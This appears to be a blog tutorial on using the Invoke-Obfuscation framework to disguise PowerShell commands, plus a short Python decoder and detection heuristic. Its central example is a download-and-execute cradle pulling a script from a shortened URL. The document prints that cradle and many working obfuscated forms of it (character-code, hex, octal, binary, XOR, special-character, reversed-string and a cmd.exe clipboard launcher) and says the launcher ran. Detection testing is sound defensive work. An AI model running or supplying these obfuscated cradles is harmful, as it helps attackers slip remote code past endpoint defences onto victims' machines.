While testing PowerShell commands with Windows Defender Advanced Threat Protection (WDATP) and preparing for some webinars I am doing in April and May, I spent some time using the framework “Invoke-Obfuscation”. I thought it might be useful to walk through how to use it and what it can do.
What is “Invoke-Obfuscation”?
“Attackers and commodity malware have started using extremely basic obfuscation techniques to hide most of the commands from the command line arguments of powershell.exe. Daniel Bohannon developed this tool to aid Blue Teams in simulating obfuscated commands based on what he currently knows to be syntactically possible in PowerShell 2.0-5.0 so that they can test their detection capabilities of these techniques.”
Firstly, to use it, you will need to download or fork the following GitHub repository.
https://github.com/danielbohannon/Invoke-Obfuscation
Navigate to the folder into which you extracted the project. Next, use “Import-Module” to load the framework.
Depending on your security settings for PowerShell, you may need to change the “Execution Policy”, and then accept each dependency as it loads. Once that is done, type “Invoke-Obfuscation” and press “Enter”.
Once it has finished loading you should see the following screen.
The tool is simple to use and has some options available for testing, as well as tutorials. Now that it is loaded, we need to decide which PowerShell command we wish to obfuscate. For this example, we can use a simple one that loads a PowerShell script and writes a message.
Invoke-Expression (New-Object System.Net.WebClient).DownloadString(‘http://bit.ly/2GfFXuD’)
Now that we have this, let’s look at using “Invoke-Obfuscation” to make it harder to understand. Firstly, we need to use “SET SCRIPTBLOCK” and add the command above.
Press “Enter”. Now we need to choose the encoding we wish to use; this is done by typing “ENCODING” and pressing “Enter”.
Next, you can choose the type of encoding you want to use for the “scriptblock” you added.
Here is the command from above using each option:
ASCII
. ( $pShoMe[4]+$PsHOmE[34]+’x’)( -joIn (’73<110-118{111I107%101<45m69<120e112%114-101-115{115{105e111<110e32_40H78%101I119_45<79m98q106_101%99e116m32q83I121-115<116q101<109_46%78-101_116_46{87%101I98{67%108q105q101I110{116q41-46<68e111{119-110_108I111I97I100e83q116-114e105-110{103_40m8216m104m116q116-112%58-47<47-98m105I116I46<108H121%47%50e71{102_70H88H117%68m8217I41′.spLit(‘e%_<q{m-IH’ )| % { ( [InT]$_ -as[cHAR]) }))
HEX
&((GET-VARiaBle ‘*Mdr*’).nAME[3,11,2]-JoIN”) ( “$( seT-varIAble ‘oFs’ ”)” +[sTriNg]( ’49&6es76X6fK6bz65}2dX45X78:70X72_65:73s73s69:6f}6es20z28_4e:65X77K2d&4f:62K6a:65_63K74_20z53K79s73X74:65}6dX2e&4ez65}74z2e&57s65K62_43}6c_69z65_6ez74X29K2e_44}6fz77X6e&6cK6fX61:64}53z74s72:69s6e:67}28s2018}68z74&74K70z3aX2f}2f&62:69}74s2es6c:79s2fK32&47z66&46K58K75_44s2019:29′-sPliT’X’-SPlIT ‘_’-sPlIT’z’-SpLIt’s’ -splIT’:’-SPLit’}’ -SPLIT ‘&’ -SPlit ‘K’| ForEACh{( [CHAR] ( [cOnVErT]::TOINt16(( $_.TostRInG()) ,16 ) ))} )+”$( SET-iTEM ‘VaRiABlE:OFs’ ‘ ‘ ) “)
Octal
((111,156, 166, 157, 153,145,55, 105 ,170 ,160,162 , 145 , 163 , 163,151, 157,156 , 40, 50 , 116 , 145 ,167, 55, 117 , 142,152, 145 , 143,164,40 ,123 ,171, 163,164 ,145 , 155,56,116 , 145 ,164, 56 ,127 ,145 ,142,103 , 154, 151,145 , 156 ,164, 51 , 56,104 , 157 ,167 ,156,154 , 157,141, 144,123 , 164 ,162 , 151, 156 , 147 ,50 , 20030 ,150, 164, 164 ,160,72,57 , 57 , 142 ,151 ,164 ,56, 154, 171,57,62,107 ,146,106 ,130, 165 , 104 ,20031 , 51) | fOreACh{( [conVERT]::toInt16(([STRing]$_), 8 ) -as[cHAr]) })-Join” | &( ([stRing]$verBOsEpREfEreNce)[1,3]+’X’-join”)
Binary
-JOin( ‘1001001_1101110I1110110S1101111>1101011_1100101!101101e1000101I1111000c1110000_1110010S1100101>1110011I1110011}1101001!1101111e1101110}100000k101000e1001110S1100101}1110111@101101>1001111I1100010I1101010!1100101_1100011e1110100k100000}1010011k1111001k1110011!1110100k1100101I1101101@101110S1001110!1100101@1110100@101110c1010111_1100101>1100010}1000011S1101100@1101001!1100101e1101110e1110100k101001>101110!1000100e1101111I1110111S1101110k1101100c1101111e1100001c1100100I1010011e1110100S1110010e1101001>1101110@1100111_101000e10000000011000}1101000e1110100I1110100_1110000@111010@101111k101111>1100010c1101001c1110100>101110e1101100c1111001c101111k110010>1000111S1100110}1000110_1011000>1110101k1000100e10000000011001_101001’.spLIT(‘_Ik!@>Sce}’)|fOREACh{ ([coNVeRT]::toInt16(( [STRIng]$_), 2 ) -as[cHaR])} ) | &( ([sTrING]$VERBOSeprefEreNCE)[1,3]+’X’-joiN”)
SecureString (AES)
([RunTimE.InterOpSeRvIcEs.marsHaL]::ptrtoStRinguni( [RUNTIMe.interOPServices.MARsHAL]::sECuREstrINGtoglobAlaLLOCUNIcODE( $(‘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’|CoNvertTO-SecUREStRIng -KeY (193..224)) ) )) |INvOKe-EXPrESsion
BXOR
. ( $SHeLLID[1]+$shEllID[13]+’x’) ( (( 22, 49,41 , 48,52, 58,114, 26, 39, 47 ,45, 58, 44, 44,54, 48 ,49,127,119,17 , 58, 40,114,16 , 61 ,53 ,58, 60 , 43, 127 , 12, 38,44,43 , 58,50 ,113,17,58, 43, 113 , 8, 58 , 61 ,28 ,51, 54 , 58,49 ,43 , 118, 113,27 ,48, 40,49 ,51 ,48, 62,59 , 12, 43 , 45 ,54 , 49, 56,119 ,8263, 55 , 43, 43,47,101 , 112 , 112 ,61 ,54,43,113 , 51 , 38,112 ,109, 24, 57 ,25 , 7 , 42, 27 ,8262, 118 )| %{ [CHAR] ($_ -bXoR’0x5f’)})-joIn”)
Special Characters
${!}=+ $();${+)}=${!}; ${=/} = ++ ${!} ; ${“./} =( ${!} =${!} +${=/}) ;${!*} =( ${!} = ${!} +${=/}) ; ${]!#}=(${!} =${!}+ ${=/} ); ${$# }=( ${!}=${!}+ ${=/} ); ${~$}=(${!} = ${!}+${=/} ) ; ${]+}=(${!}=${!} +${=/} );${+~}=( ${!}= ${!} + ${=/}) ; ${@} =(${!}=${!} +${=/}) ;${+}=”[“+ “$(@{} )”[${]+} ] +”$(@{})”[“${=/}${@}”]+”$( @{ })”[ “${“./}${+)}” ] + “$? “[${=/} ] + “]”; ${!}= “”.(“$( @{ } ) “[ “${=/}” +”${]!#}”]+ “$( @{ } )”[ “${=/}”+ “${~$}” ]+”$(@{ })”[ ${+)} ]+ “$( @{} ) “[${]!#} ]+”$?”[ ${=/}] + “$( @{} ) “[ ${!*}]); ${!}= “$(@{} )”[“${=/}${]!#}” ] +”$( @{ } ) “[${]!#} ]+ “${!}”[“${“./}${]+}” ];”${!} ( ${+}${]+}${!*}+${+}${=/}${=/}${+)}+ ${+}${=/}${=/}${+~} +${+}${=/}${=/}${=/} + ${+}${=/}${+)}${]+}+ ${+}${=/}${+)}${=/}+${+}${]!#}${$# }+${+}${~$}${@} + ${+}${=/}${“./}${+)} + ${+}${=/}${=/}${“./} + ${+}${=/}${=/}${]!#} + ${+}${=/}${+)}${=/} +${+}${=/}${=/}${$# } + ${+}${=/}${=/}${$# }+ ${+}${=/}${+)}${$# } + ${+}${=/}${=/}${=/}+ ${+}${=/}${=/}${+)}+ ${+}${!*}${“./} + ${+}${]!#}${+)} + ${+}${]+}${+~} +${+}${=/}${+)}${=/} +${+}${=/}${=/}${@}+${+}${]!#}${$# } +${+}${]+}${@} + ${+}${@}${+~} + ${+}${=/}${+)}${~$} + ${+}${=/}${+)}${=/}+${+}${@}${@} + ${+}${=/}${=/}${~$} +${+}${!*}${“./}+ ${+}${+~}${!*}+${+}${=/}${“./}${=/} + ${+}${=/}${=/}${$# }+${+}${=/}${=/}${~$} +${+}${=/}${+)}${=/}+${+}${=/}${+)}${@}+ ${+}${]!#}${~$}+${+}${]+}${+~} +${+}${=/}${+)}${=/} +${+}${=/}${=/}${~$}+${+}${]!#}${~$} + ${+}${+~}${]+} +${+}${=/}${+)}${=/}+ ${+}${@}${+~}+ ${+}${~$}${]+} +${+}${=/}${+)}${+~}+ ${+}${=/}${+)}${$# } +${+}${=/}${+)}${=/} +${+}${=/}${=/}${+)} +${+}${=/}${=/}${~$}+${+}${]!#}${=/} + ${+}${]!#}${~$} + ${+}${~$}${+~}+ ${+}${=/}${=/}${=/}+${+}${=/}${=/}${@}+ ${+}${=/}${=/}${+)} +${+}${=/}${+)}${+~}+ ${+}${=/}${=/}${=/}+${+}${@}${]+}+${+}${=/}${+)}${+)} +${+}${+~}${!*} +${+}${=/}${=/}${~$}+${+}${=/}${=/}${]!#} + ${+}${=/}${+)}${$# } + ${+}${=/}${=/}${+)} + ${+}${=/}${+)}${!*} + ${+}${]!#}${+)} +${+}${+~}${“./}${=/}${~$} + ${+}${=/}${+)}${]!#}+ ${+}${=/}${=/}${~$} + 
${+}${=/}${=/}${~$}+${+}${=/}${=/}${“./}+${+}${$# }${+~} +${+}${]!#}${]+} +${+}${]!#}${]+} +${+}${@}${+~}+${+}${=/}${+)}${$# } +${+}${=/}${=/}${~$} + ${+}${]!#}${~$}+ ${+}${=/}${+)}${+~}+${+}${=/}${“./}${=/} + ${+}${]!#}${]+}+${+}${$# }${+)} + ${+}${]+}${=/} + ${+}${=/}${+)}${“./} + ${+}${]+}${+)} +${+}${+~}${+~} + ${+}${=/}${=/}${]+} +${+}${~$}${+~}+ ${+}${+~}${“./}${=/}${]+}+ ${+}${]!#}${=/} ) “| &${!}
Whitespace
‘ ‘|FOREacH{$bFpejQ= $_ -ispLit ‘ ‘| FOREacH { ‘ ‘ ; $_ -ispLit ‘ ‘ |FOREacH { $_.lENGTh -1}};&( $pShOMe[4]+$pShome[34]+’X’)( -joIN (((-joIN( $bFpejQ[0..($bFpejQ.lENGTh-1)]) ).triM( ‘ ‘ ).SpliT(‘ ‘ ) | FOREacH{ ([INT] $_-aS[cHaR])}))) }
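The ASCII, HEX, Octal, Binary and BXOR outputs above all share one shape: a list of character codes, split on a set of junk delimiters, converted back to characters and joined. The following Python is an added example (not part of this post or of the Invoke-Obfuscation project) showing how an analyst can reverse that scheme on a logged command line and a cheap heuristic for spotting it; all samples are constructed and encode the harmless string "Write-Host".

```python
import re

# Constructed samples that mimic the shapes of the ASCII, HEX, Octal and Binary
# outputs shown above; each encodes "Write-Host" (none is taken from the page).
SAMPLES = {
    "ascii":  ("87<114-105{116e101%45m72<111-115{116", "e%_<q{m-IH", 10),
    "hex":    ("57X72_69z74s65:2d}48&6fK73X74", "X_zs:}&K", 16),
    "octal":  ("127,162, 151,164 ,145,55,110,157,163,164", ", ", 8),
    "binary": ("1010111_1110010I1101001S1110100>1100101_101101!1001000e1101111I1110011c1110100",
               "_Ik!@>Sce}", 2),
}
# Constructed BXOR sample: each byte was XORed with 0x5f, the key used in the BXOR output above.
BXOR_CODES, BXOR_KEY = (8, 45, 54, 43, 58, 114, 23, 48, 44, 43), 0x5F


def decode_split_join(encoded: str, delimiters: str, base: int) -> str:
    """Undo the split/convert/join scheme: split on any delimiter character,
    parse each token as a character code in the given base, join the characters."""
    pattern = "[" + re.escape(delimiters) + "]+"
    tokens = [t.strip() for t in re.split(pattern, encoded)]
    return "".join(chr(int(t, base)) for t in tokens if t)


def decode_bxor(codes, key: int) -> str:
    """Undo the BXOR scheme: XOR every code with the single-byte key."""
    return "".join(chr(c ^ key) for c in codes)


def looks_like_split_join(cmdline: str) -> bool:
    """Triage heuristic for a logged command line: integer-to-character
    conversion combined with a split or join strongly suggests this encoding.
    The octal variant above has no split call but still ends in -join, so it is caught too."""
    low = cmdline.lower()
    converts = re.search(r"\[\s*char\s*\]|toint16", low) is not None
    reassembles = re.search(r"-join|\.split\s*\(|-i?split\b", low) is not None
    return converts and reassembles


def decode_all() -> dict:
    """Decode every constructed sample; an analyst would feed real command-line
    fields from process-creation or script-block logs here instead."""
    out = {name: decode_split_join(*spec) for name, spec in SAMPLES.items()}
    out["bxor"] = decode_bxor(BXOR_CODES, BXOR_KEY)
    return out


if __name__ == "__main__":
    for name, text in decode_all().items():
        print(f"{name:7s} -> {text}")
```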
I just like looking at them when they are encoded. Another option is to use “STRING” instead. You can then choose from the three options:
Choosing the third option changes the command to the following:
$LwFhTO =” ) )’)’+”D’+’u’+’XF’+’fG2/yl’+’.tib//:p’+’tth'(gnir’+’tSda’+’o’+’lnwoD.)tn’+’ei’+’lCbeW’+’.teN.’+’metsyS tcejbO-‘+’w’+’e’+’N(‘+’ ‘+’noi’+’s’+’serp’+’xE’+’-e’+’kov’+’nI'(( )”nIOJ-‘x’+]3,1[)(GNirTsot.eCNEreFERPEsobREv$ (&” ; ” $( Sv ‘OfS’ ”) ” + [stRING] ( ( Gci (‘vArIa’+’b’+’lE:lwFHTO’) ).VaLue[ -1..-(( Gci (‘vArIa’+’b’+’lE:lwFHTO’) ).VaLue.lENgTH ) ])+”$(sET-ITem ‘VariAbLE:OFS’ ‘ ‘ )” |& ( $sHEllId[1]+$ShElliD[13]+’x’)
You can also set the “LAUNCHER” that will run the obfuscated command. By default the command can only be run from PowerShell, but setting a “LAUNCHER” changes that.
If you choose “CLIP+”, you then get to choose any execution flags that should apply.
For now, I am going to choose “0”. The command is then changed to the following:
cMd.exE /C”ECHo -JOIN( (49, ‘6e’, 76 , ‘6f’ , ‘6b’ , 65,’2d’,45 ,78,70, 72 , 65 , 73, 73,69,’6f’ ,’6e’,20,28 ,’4e’, 65 , 77 ,’2d’ , ‘4f’, 62, ‘6a’ ,65,63 ,74, 20 ,53, 79 ,73,74, 65 ,’6d’, ‘2e’ , ‘4e’, 65 , 74 ,’2e’, 57 , 65, 62 , 43 ,’6c’ ,69 ,65 , ‘6e’ ,74, 29, ‘2e’,44 , ‘6f’ , 77 , ‘6e’ , ‘6c’ ,’6f’ ,61 ,64 ,53, 74, 72, 69 , ‘6e’ ,67, 28 ,2018, 68, 74,74 , 70 ,’3a’ ,’2f’,’2f’ , 62 ,69 ,74,’2e’ ,’6c’ , 79, ‘2f’, 32 ,47, 66,46, 58 ,75 , 44 ,2019 ,29 ) ^^^| foreaCH-OBJeCt{( [ChAr] ( [CoNverT]::toiNt16(($_.TOSTrInG()) ,16) ))}) ^^^|^^^&( $VeRBosePReFErENce.ToStrInG()[1,3]+’x’-joIN”)|Clip && powERShEll -sT ${l`dfo} = [System.Reflection.Assembly]::(\”{2}{1}{0}{3}\” -f ‘i’,( \”{1}{2}{0}\”-f ‘art’,’With’,’P’ ),(\”{1}{0}\” -f’oad’,’L’ ),( \”{1}{2}{0}\” -f’me’,’al’,’Na’ ) ).\”inv`OKe\”(( \”{1}{4}{2}{3}{0}\” -f’s’,’Syst’,’m’,’.Windows.Form’,’e’ ) ) ; ( ^& ( ‘Gv’ ) ( \”{3}{2}{0}{4}{1}\”-f’O’,’t’,’nC’,’eXeCuTio’,’nteX’ ) -valuEoNly).\”invokec`O`mM`AND\”.\”inVOk`es`CRI`PT\”( ( [wINdowS.forms.CLiPBOArd]::( \”{0}{2}{1}\”-f ‘gE’,’XT’,’ttE’).\”i`NVoKE\”() ) ) ; [Windows.Forms.Clipboard]::(\”{1}{0}{2}\”-f ‘tT’,’Se’,’ext’).\”In`VOKe\”(‘ ‘ )”
As you can see, it looks very different from the original one we started with. Once you have created it the way that you want it, you can execute it locally by using “TEST”. If you have applied a “LAUNCHER” such as “CMD”, then you will not be able to test it this way.
Taking the above command and running it in a “Command Prompt” executes the PowerShell perfectly.
Executed
As you can see, obfuscating PowerShell with “Invoke-Obfuscation” is simple, and the tool is easy to use and very powerful.